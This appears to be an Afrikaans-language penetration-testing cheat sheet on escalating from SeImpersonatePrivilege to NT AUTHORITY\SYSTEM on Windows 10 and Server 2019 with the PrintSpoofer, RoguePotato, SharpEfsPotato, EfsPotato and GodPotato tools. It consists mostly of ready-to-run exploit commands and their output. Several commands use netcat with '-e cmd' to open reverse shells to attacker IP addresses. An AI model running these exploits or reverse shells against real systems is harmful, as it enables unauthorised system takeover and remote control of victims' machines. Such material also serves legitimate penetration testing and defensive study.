JuicyPotato werk nie op Windows Server 2019 en Windows 10 weergawe 1809 en later nie. Tog kan PrintSpoofer,RoguePotato,SharpEfsPotato,GodPotato,EfsPotato,DCOMPotato** gebruik word om die selfde voorregte te benut en NT AUTHORITY\SYSTEM vlak toegang te verkry. Hierdie blogpos gaan in diepte in op die PrintSpoofer hulpmiddel, wat gebruik kan word om impersonasie voorregte op Windows 10 en Server 2019 gasheer te misbruik waar JuicyPotato nie meer werk nie.
Vinige Demo
PrintSpoofer
c:\PrintSpoofer.exe-c"c:\tools\nc.exe 10.10.10.10 443 -e cmd"--------------------------------------------------------------------------------[+] Found privilege: SeImpersonatePrivilege[+] Named pipe listening...[+] CreateProcessAsUser() OKNULL
RoguePotato
c:\RoguePotato.exe-r10.10.10.10-c"c:\tools\nc.exe 10.10.10.10 443 -e cmd"-l9999# In some old versions you need to use the "-f" paramc:\RoguePotato.exe-r10.10.10.10-c"c:\tools\nc.exe 10.10.10.10 443 -e cmd"-f9999
SharpEfsPotato
> SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami | Set-Content C:\temp\w.log"SharpEfsPotatoby@bugch3ckLocalprivilegeescalationfromSeImpersonatePrivilegeusingEfsRpc.BuiltfromSweetPotatoby@_EthicalChaos_andSharpSystemTriggers/SharpEfsTriggerby@cube0x0.[+] Triggering name pipe access on evil PIPE \\localhost/pipe/c56e1f1f-f91c-4435-85df-6e158f68acd2/\c56e1f1f-f91c-4435-85df-6e158f68acd2\c56e1f1f-f91c-4435-85df-6e158f68acd2df1941c5-fe89-4e79-bf10-463657acf44d@ncalrpc:[x]RpcBindingSetAuthInfo failed with status 0x6d3[+] Server connected to our evil RPC pipe[+] Duplicated impersonation token ready for process creation[+] Intercepted and authenticated successfully, launching program[+] Process created, enjoy!C:\temp>typeC:\temp\w.logntauthority\system
EfsPotato
> EfsPotato.exe "whoami"ExploitforEfsPotato(MS-EFSREfsRpcEncryptFileSrvwithSeImpersonatePrivilegelocalprivalegeescalationvulnerability).PartofGMH's fuck Tools, Code By zcgonvh.CVE-2021-36942 patch bypass (EfsRpcEncryptFileSrv method) + alternative pipes support by Pablo Martinez (@xassiz) [www.blackarrow.net][+] Current user: NT Service\MSSQLSERVER[+] Pipe: \pipe\lsarpc[!] binding ok (handle=aeee30)[+] Get Token: 888[!] process with pid: 3696 created.==============================[x] EfsRpcEncryptFileSrv failed: 1818nt authority\system
GodPotato
> GodPotato -cmd "cmd /c whoami"# You can achieve a reverse shell like this.> GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"